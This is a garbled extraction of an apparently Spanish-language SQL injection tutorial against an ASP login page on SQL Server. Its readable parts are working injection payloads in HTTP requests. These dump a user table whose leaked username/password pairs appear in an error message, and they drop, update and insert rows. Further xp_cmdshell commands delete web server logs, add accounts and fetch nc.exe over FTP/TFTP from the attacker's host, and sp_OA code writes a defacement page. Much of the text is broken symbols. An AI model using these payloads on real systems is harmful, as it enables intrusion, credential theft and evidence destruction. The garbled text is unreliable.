Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 297
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27+union+select+b.name%2C1%2C1%2C1+from+sy
sobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3
D%27usuarios%27+and+b.name+in+%28select+top+01+b.name+fro
m+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.na
me%3D%27usuarios%27+order+by+1+desc%29+order+by+1-&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
. "
Y
Y
H
+
"L
"
)
& & & *
"+" )4 " & "+"
"
)
V)
VL "
"L
)
E"
)
*
"+" )4 " & "+"
")
V)
VL "
"L
)+
" F
)+ 00
> ">

"

"
) "
"

" III H
"&
(
"
+
=
9
"
" # *
"
(
"
.
&
"
"
+
% .
"
1 :1
"
.
+ 9
"
"
"
&
"
"
"
" ) "
""
#S#:-b8';# + #S#':%
1#
"
> ,>
*
9
" )
"
6
(
"
;:! E8 "
"
F %
" "
"
(
1
6
9 "
" 6
"
#8%8';
7 " "& "=
*
9 )
6 "
"

B
4

;:!&
"
"
;:! F

;:,:#
6

!:#;
%

" 9

"

"

.
)4

)
)

"

"

"

"

"

"

"

"

" &

Ups' union select b.name,1,1,1 from sysobjects a,

syscolumns b where a.id=b.id and a.name='usuarios' and
b.colorder = 48 -7

"

"

" E!
>F

" >
!

"

&

"

"

"
"

"

" "

+J
")

"

"

.
(

"

Microsoft OLE DB Provider for ODBC Drivers error

'80040e07' [Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error converting the nvarchar value
'UserSubPLUSDate' to a column of data type int.
/Login.asp, line 85
:M& 6
"
:,-' "
" 9
)
# 5 :# " > " # )!% #, > % .
6
".
;:! + " .
)
"+
"
:-

.#

5
".

#&

&
6

"& "

)
"

&
"

"

&+
" &

) "
"
&
>#

9
)7 "
" " % .
"
D
*

"
"

*
"

"

+
" 6 (

9 "
"
) "
) + "
" 9
"
#$% > 1 :1>&

"
6

.
" "
EF> "

# )
"
1 :1
"
"
"
" >) " ">
. 4 #$%&
" 9
" J
" *
"& " )
J
6 " ) "
" !
4
&
"
1 :1& "
"
"
>
" "
"
"
" ) "
"
!

"

EF&

" )

"

"

*
"

"

J
>&

"

)
.

C
5

9
(

"
"4

) "
&

"&

"
".

" .

"
"

"

" 6
"

< +

"
+

"

"

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 82
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usu
arios--&txtPassword=Angel
Y
Y
Y
H
9
6
"
>! ""
>
Y
*
. "
Y
H
+
L
"
" E ,F& & & *
"
"00
6 (

"& .
!:#;
"
<

6
".

"
" 6

"
=
6 & )

)4

1
"

"

Microsoft OLE DB Provider for ODBC Drivers error

'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]The sum or average aggregate operation cannot take
a nvarchar data type as an argument.
/Login.asp, line 85
)

"
"
&
9

"

"
I8
, )
)

"
"
,>
9 "
" 6

E>
"

" "

&
"
"
"

9
6
"

4
4
" "
"

F
1:&
" 9 =

6 :,-'
"
" )
9
( "

" "
"
"

"

"

)
& "=

&

2
"

" 6
" #$% ) "
#$%KK&

"
8
"

"&

"&
"

"

"
"
)

#
"

"

"

"

)
" E! "

"

"

"

+
) "
"9 ".

"

&

.
"
""
"& "
.
#$% ! . *
& )" 6
1 &(
!
# 5 :#

6
" D
"
"
6
, "
.
)
"

&" *
"& "

"

)4

"
" "
" #$%
1 :1& 9
"
"
"
( & ; !: ,8 ,5;: 9
" "

9 "
#$% "

"

(!

*
"

9 "
<
="
>#
>
& #$% "
"
"
"
4

"

"
<
"

&

"

"
"
"
"
"
"
"
"
8

"

I
#$%

"
+

"

" 9
1H5 ' 5
" "
) "

" " ! <1

" " !
M
" " %"#
"
" " ,
" " ,
M
" , E1 )
"
"
#
" !G# E'
" D F

"
+
"
"
"
<
"
!
&
"
> > .
>
" E!
.J
&
"
" "&
"
"
)
"
"
)
"
)
"
"
6"
"
>
>&
9 ;:,5 *
"
)4 6 & b 1;5
)
+8
>
.
" ,
&
"
&
9 F
.
.
"

&

""

.
)
6

"

"

EA
7

"
+
>5 6
6

"

" 1H5 ' 5

" >9 4
>
#

" 6"

4 # #
"
" " # )!% #,
"
" "
."
,
"
" " ! ) ! *
"
" " ! *
M
"
" " ! * "
"
" " ! <#
"
'

"

.
-

"

"

" 4
" F

"

"

.
&9
"
<
' " 5 +
` a>& #$%
&
6
"
"
"
" 4 "
9
"
" "
" 4 "
*
> ,>

8"

IIF

"

!
:M&
4
*
*

"

(
" )
"& . "

" +
"

"
"
> .
F 9
"
" 9
" .
" " ) "& + " "
*
>86
"&
"
""
"
4
E%
"
9
9 "
+

2
4; !
6 (
" "
" )4

*
"
6 &

#!

!<
#$%&

!&

(!
(

"

"

>)
6

"

) "
" 7

" 9

"

"

(! , 8 .=
.
"&
. &
"
"9
"
"
A=4 " 9
*
4 . "
"
""
(
7
" " "

> $6 3 /
%
#$%
"
*
H 6

.
."
"
6 !:#;

>

*
)

)
.
"

"
"
"

"

) "
)
6

"
*
&

"

(! 6#; !
"
) "
E% 9

"
6

"
"
" *
"6

"

6
"
"

& "
(
*
1;:
9 " .
"
6"
(
F
*
"
" , + !G#
F+6

"

) =

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D
%27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3
B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in
to+xtmp--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y

2
H

+
<V
W

<

L
[L L[

<[

-> $6 3 , 8

<6
"[L]L*

6 ( "
#8%8';

EB
"

"

F"

<VLL "
U
<"

< "

(! 6#; !

"

&

"

"

"

<

"

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 76
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp-&txtPassword=Angel
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
H

)
"

(
"
*

"L
"
)

"

!:#;
" 4
*

<& & & *

*

<

00

&
"
"

6
*

:,-' 6 6
.)
"

" "

Login de Usuarios Registrados

Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error converting the varchar value
'Danyr2/pepe;THEMA/M1703;CIELORIANO/daniel;ALELARRAINP/14
05;SANDRA/4484188;0001/13119695;AsdrubalCh/1173;beatrizay
ala/10338154;maria_perez/12345;batv/peresosita;susy/susyk
a;Mireya_Salazar/gabriela;MVidales/male;AngelicaS/chainy;

22

carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne
ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2
11095;victor...
/Login.asp, line 85
2> $6 3 4! &

6 ( )
(
, :!&

"
"
"

"

(! 6#; !
") "
&

"&

"

)
" .
4

".

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 53
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
.
Y
H
+
L]
) <
00
- 6!
;
"

!
"

"
6 " "
"& 9

""

"

"
")
." "

"
"
(

"

6
6

" .
)
"9

&"
"
.

" 5
"
"

"9
) "

"
"

&

"

"
"
"""
"&
*
&
" "
"
. .

"

$+6 4
H

"
""
!,5;8

9
"

"

"
.

"
""

6=

!:#;
+

(
"

23

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 103
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2
7+where+uid%3D%27Carla%27--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
H
+
L
"
""
"VL1 6 ! ""L
VL'
L00
+4 4 4
#

&

+
9

"

"
E5 9
."

9
"

"

#$% # 6 F

!:#;
"

&

"

'delete from usuarios where UID='Usuario'--

1 4
$

"
4
"
" "
&
4

1#8 ;& )

&
" "
9 +
" "
"
&

KKKF
9

"&

" "

"

"
"

" 6

"

.
=

"
(
"& +

"9
9
6 "

"

)
"

7
.

"

"
&
"

"
)

"
""

")

"

(
" E'
"
&
(

!
. & +
"
4
. 9
=
6
"
9
" "

2?
5"=
"
".

"

&

"

9
=
(

"

.
" )

"

<"
" " "
" ) "
&
9
" "
"
!:#; 6=
:)6
7<
*
9 "
+
.
"
"
"+" " "

1#8 ;
*
"

4
"

"
+

&
"

+
&
6

"

"

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 113
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser
%27%2C%27MyPassword%27%29--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
H
+
L] "
"
"6
" EL + " L&L +! ""
LF00
% &
"
(

&

!
.

!
.
" 7

"

"
)

" 6"
"

&
<

""
"
"
"
*
6
"*
" >8<

"
#$%
1:
"9
#

!
4
*

"
"

"
*

"
"

)
(

"
&
"
.
" * #$% # 6

">

"

"
$

% "
) "

II

#
"

"
"
6 "

?4;
<

$
" "

"
"
8< "
"
#0#$%& "
")
" 5
.
" "&

#
" & ,%%L" 9
"
&

*
#0#$% )

<
"
"
")

"

"
"
" <

"&
.

2@
"

"
&

"
5

" <

"

"&
" )

" *

"
"

"

N Q
"
> ">
4
"

"
"& "
"" "
" < Q
"

"

K6
" ;;!

) "

" "

"
"

"

"

"9
"
( =

"

"

""
" "

9 "
"
+ "

"

"

6 6= #$%
" ".

"

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 90
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe
+dir+c%3A%27--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
H
+
"L]8N8' "
) < Q
"
L
<
L00
:M
9
E
,

"

"

"
6
=

" *
"
" *

" "
)
.
4

"
) 4

"

=
)

&6
6
" " =

"
4
& "
"
"
)" 6
"
* "6
"6
" E8 "
"
"
"F

< Q

) 4
")

"

>

>
"

"
< Q

(
"

.
"

"
"

"*
E/

&

.
&

"
"1

&
9

#5
F
"
"
9
"
" & F
"

"

!
"
EXEC master..xp_cmdshell 'dir c:\inetpub\wwwroot\'
! 6
9
6
EXEC master..xp_cmdshell 'type
c:\inetpub\wwwroot\alguna_pagina.asp'
!
"
)
EXEC master..xp_cmdshell 'copy c:\winnt\system32\cmd.exe
c:\inetpub\wwwroot\chroot.exe'
! )
"
EXEC master..xp_cmdshell 'DIR
c:\winnt\system32\logfiles\w3svc1\'
EXEC master..xp_cmdshell 'NET STOP "Servicio de
publicacin en
World Wide Web"'
EXEC master..xp_cmdshell 'del
c:\winnt\system32\logfiles\w3svc1\
filelog.log'
EXEC master..xp_cmdshell 'NET START "Servicio de
publicacin en
World Wide Web"'
!
6 "
EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path'
!
"
6 G
"
EXEC master..xp_cmdshell 'NET USER username password'
:M&

"

"
8<
" "

"
.

">&
"

"

"
" #

" >8<

"
)7 )
" +

">&

"

"

"

"
&

>1
4 "

"

'exec master..sp_addlogin MyUser, MyPass

9
;

"
"

!
"
=

" .

" "

6 &"

*
&
.
. "
)
&
"
"
"
"> + >8<
#
!
"> 9
) =
" " ! "
"
" "
"
&
#0#$% # 6
"
*
"
"+" " "
6 "*
"

"
" )

"
9
" " >#
"
"
) "
"*
"
+
"
"

2B
"
"
"
"
"

Q
Q
Q "
Q *.
Q "6

+
)

- $ %+ )
%
"
"
"
4
&
)
*
(

Q
.
Q
) "M
Q .
Q .
Q .
M +

& *

"

"

"
%

"
<
<
<
<

> *
"

+(
9
:,-'F&
"
"
"
322&
9
" # )

7
9
9

<
<
<
<
<
&

"
"
" "
"

"+ 7
'
4
"

&

"
"
" H

"
" .

"
"
"
(

"

"
"
) 4
"

" +
#$%
9
4

>
"& 9

"

"

67"

<

#$% E$ +
" #$% 6=
#5& " )
*
" #$%&

) "
""

"
& ".

"
.

"
1 &
M
<&
6

Q .
6
Q" 6
Q
"
Q
Q 6
.

&9
4
.
"
>
. (( #
<
" "
" . "* .
"

+
"

*
+ ;

"
>&
7

"
"

----- Extracto -----------------------------------------[...] La idea es crear una pagina html o asp, si en

el sitio objetivo se encuentra activo y funcinando un
webserver [...]
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\web-hosting\attajdid\index3.html', 1
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD>
<BODY text=black bgColor=#000000> <CENTER> <P><B>'
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<FONT face=Arial color=#b4b58c size=7>Vosotros
</B>Perejil...</B></FONT></P></CENTER> <P><BR><BR>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<!--" "-></P>
<P></P> <CENTER> <P><B><FONT face=Arial
color=#b4b58c size=7>'
exec @ret=sp_oamethod @f, 'writeline', NULL, 'nosotros
vuestras
</B>WEB<B>s!!!</B></FONT></P></CENTER>
<P><BR><BR></P>'

2C

exec @ret=sp_oamethod @f, 'writeline', NULL, '<DIV

align=center>
<CENTER> <TABLE cellSpacing=0 cellPadding=0
width=100 border=0>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<TBODY>
<TR>
<TD bgColor=#d20000>&nbsp;</TD></TR>
<TR>
<TD align=middle bgColor=#ffff00>'
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<FONT color=#ffff00
size=1>ORTO!<BR>Va
por vosotros!!!
</FONT></TD></TR>
<TR>
<TD '
exec @ret=sp_oamethod @f, 'writeline', NULL,
'bgColor=#d20000>&nbsp
;</TD></TR><!--" "-></TBODY></TABLE></CENTER></DIV> '
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<P><BR><BR><BR><BR><BR></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P
align=right>
<FONT face="Courier New" color=#00ff00 size=5>
lagear & runlevel</FONT></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P
align=right>
<FONT face="Courier New" color=#00ff00
size=4>Recuerdos a
<B>N</B>9<B>Team</B></FONT>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '</P> <P
align=right>
<FONT face="Courier New" color=#00ff00 size=3>'
exec @ret=sp_oamethod @f, 'writeline', NULL, 'Donde te
podemos
encontrar BreakICE?</FONT></P> <FONT color=black>"
</FONT>
</BODY></HTML>'
Para subir archivos.- Creamos un archivo get.txt para
utilizar luego ftp
declare @o int, @f int, @t int, @ret int
EXECUTE sp_oacreate 'scripting.filesystemobject', @o out
EXECUTE sp_oamethod @o, 'createtextfile', @f out,
'c:\get.txt', 1
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'user
anonymous'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'get
nc.exe'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'quit'
EXECUTE master.xp_cmdshell 'FTP -s c:\get.txt
NUESTROHOST'
o algo mas fcil si tenemos un tftp en nuestro host
EXECUTE master.xp_cmdshell 'TFTP -i NUESTROHOST GET
c:\mi_local_file c:\remote_file'

----- Extracto -----------------------------------------:M&

)
)4 "
6 " *="
" "

"
"
# 6
"

.
E

.
" 9
" 8

"

"

& ) "
" "

"

(
" *
"
6" "
#0#$% # 6 &
")
"
.
"
" &"
" Q
+" Q
9
"
"
)4 :%8
"
" * #$%
"
. * "+"
)4 F +
"
7
"
)4 6
" )
"
"

;
" Q

. &c " &

M : ;! ;
< a

)4
`&
;
" Q

)4

`&
6
`&`
`
aa

M &
: ;! ; a
Va

"

# )
"
" ) "
9
7

9
&
"IF
*

)
5
*

"

7"

"

"

&9
"&

"
6"

"

"

"

" D
"
)
+ =

" &
J

" "

"

)
"
"

"

"

>;

""

"
" ) " "
& "
+
"
. &"

7
"

"

:
.

"
"

G )5
"
"
"

L 1;: : ;A %8L
>
>
+ =
"
"+ )

&

#$%
9 6
)
<"
6
"
( " E: ) =
"
*
" " "
#$% +
"

#
"

"
+! 4 >
"
"
#$% 4

*
#
'
%

#0#$%

)
.

") " "

0

"
"9
9 "
.J
#$% 4

) 4
"

! "

` : ;! ; a

= "

"

""

"

3
03 !
# )"
" ") "
1 :1 " )
H
"
1 "
J

"
""

0 +,# )"
" ") "
1 :1 " )
!
"5
1 "
J

" E *Q* KF
"

"
""

"

"

0$ .
#
':!S E8 "
# )"
" ") "
1 :1 " )
!
"5
J
""
""

"
" ) "K

0
# )"
" ") "
1 :1 " )
!
"5
"
J
""
""
" ) "K
"
" ""
"
E< Q
"
&" Q
" F
"@ %

"

&

.
*

"

'

"
" .

.
" .

"

&

9
"
& "
4
"

&
"& "

7 . "
6
7 . "

"

"

"

" *
" 6

"

"

"

"

"
".

(
#0#$%

"

"

"
"
"

"
" "

(
"
(

&
")
6

"
)

# 6
" " 6
"
"

"9
" J
" " 6
" ) "

"
"9
!
4 *="
" "" 6
8" ) (
! =
'
(
# *
*
"
"
<
+
" ;'! 322 + ,! 323F
1
"
" 6
" )
"
" 6
1
"
"
=
& "
"
"

"

! M

""
""

"
A

" 6=
"

"
) "

" 8"

"
6

#$% " 6

3
! " " "
.
" .
*
.
E,
" 6
"
) "
""
" . ( &
M"
)
*.
F
H *9
6
"
"
"
"
"
#0#$% # 6
8" ) (
"
6 . "
"& " )
"
" 9
(
" "
"
"
8" ) (
6 "
" .
6
"
* "
*
E
"
"
" .
) 0
"
"
"
*
(
"
M
" "
MF
8" ) (
""
*
#5
# "
9
" .
&
" "
"
*
"
."
6
#0#$%
6 '
1
4
)
) "
"
6
" "
"
"
" "
.
"
(
"
.
" H
6 )
"
"
) "
" ' 9 "
"
"
"
" "
"
"
" >$
> "
"
" 9
" " .
) "
"
"A %

#0#$% # 6
"
6 "
" 6
" .
&
9
.
6 (
"
" "
"
'

"
6

" .
6
8

!
"

"

.
9
"
"

*
"

& +" ")

" 7
" +
" " *
" "
"
") " "
" ) + +"
(
"
"
"
) 4
"
6 " " " .
"

&

"
"
+
"
""
") " & ")
<
M ." )
#0#$% # 6

"

"
6 & <"
"9

"
"

+ "*
"
" +# 6 "!
" )
"
"&
6 "
" .
G
"
" "
"
" . > +
"
"
"
) = 6 " #$% 4
# )
*
"
"
*
M .
*
"
"*
"&
"
"
) =
"
.
6
)
"
)
" " " "
" . (
# #;8 5 G
"

(
M"
".
"
)
"
.

"
""

" 9
" ) "
+ = "
7<
" +

"

"
8

" G
"
""
"+
"
"
"
"
6 " E;
"
"
9
"

"

"

" 7

"

"
"

"&
6

"

"

"&

.
" .
6"
"

" .

"
"

" . "&
" "A
= &
*.
" ""
* "
*
& " )
"" 6
>
.= " )
"
)
"
*=
4
& 74

.
"

&
"
&

"

"
"
#0#$%F 8"
. " D " ". *

32

'

6
G
"
2& + "
" ")
"9
" "
"
" )
"
" " .
E5
(
" 5
"& ,
6 " # .
& 8A#& F "=
)7
%81;:
" *
"
( " "
"
"
* & "
"
9
".
)
"
"
#0 #& #0#$%& # "
" 8 !&
"
"
)
( "
*
&
"
.
&+
9
#:- 8 " "
6
5

"
"

"

"
9
+
" " "
"
"
6 " .
6"
"
"

"

"& +

5 " >5 . !

"C

"
+ " 6

"

"
"

"
>

"
*

7
" + %

" 9
"

M . 8< "
M
.
"9 "

7
" #$%
" '

"

<

% & ! &
G
"
> E #-1 B303B 022CB0@F
M
"
Q QG
"
"9 "9 Q 3

" *
"9 6
6 " +
"
+
"
" #$% 4
G
!
*
"
"
"
.Q#$%Q# 6 Q " .Q#$%Q 4
*
< . ""
" 6
Q"9 Q 4
*
< . ""
"
Q 6
Q"9 Q 4
*
< . ""
" 0#$%
*
< . ""
"
M .0"9 0 ""
" *
< . ""
"6
.Q
) " Q"
+ *
"
"
+ 6 " ?,! 1 ! @8
"
. "
Q6
"9 "

"

"D

!
M "
M "

M
"
"

<
+
+

*
.'

"
M M
M " #9 )* (

+9
"
" 5

&

>

- M >
"

"

"*

" )
&
">

<

6
6

33
M
M
M
M

"
"
"
"
<< "
"

"
"
"
"

+ . 1; "
" #9 M (
+ . G "9
<
+ . G "9
.(
+ +
. )5
"0 0 @0) (
"

"*

"

"
" M
+
"B
01
0
0'
0S

"
"

, :!
"9
" . II )+ 5 .
' % . "
"
" *
" )
")
"I )+ 5 .
6.

"

*
* "

"

)+ 1
F )+

"
59 =

. &
" 6 =
"
.
"
= &+9
.
"
)

9
"

" .
D

. &

.
1

"

(
+

"

"
" "

"

"
"
. (( #
+ ;
>
> < 1
)
" )
"
"
"
+
9
"
")
6

"

"

" " "6 "

"* (
"
" ") ( "

"

"

"
(
&
9
" *
"9
"
"&
" < ") " ""
"

"

"
"

"

"

"
)7

. "
"

"

"

" *
" *
;

"

&

=
"
"

MQJ

% ! (
(

**
= "
.
"

"
;

"
"

/
!

9
"
#
& .

" " "

5 " >5 . !

=
#0#$%&
"9

67"
"

+# *
"
" .

" "
#$% 4
% d
" "

"
*
>

"
&

# 9
. "
"
E8"

"
"

"

"
.

"J
. "
<"

" "
" " .

"KF
"

"
9 D

"

+*
O1 <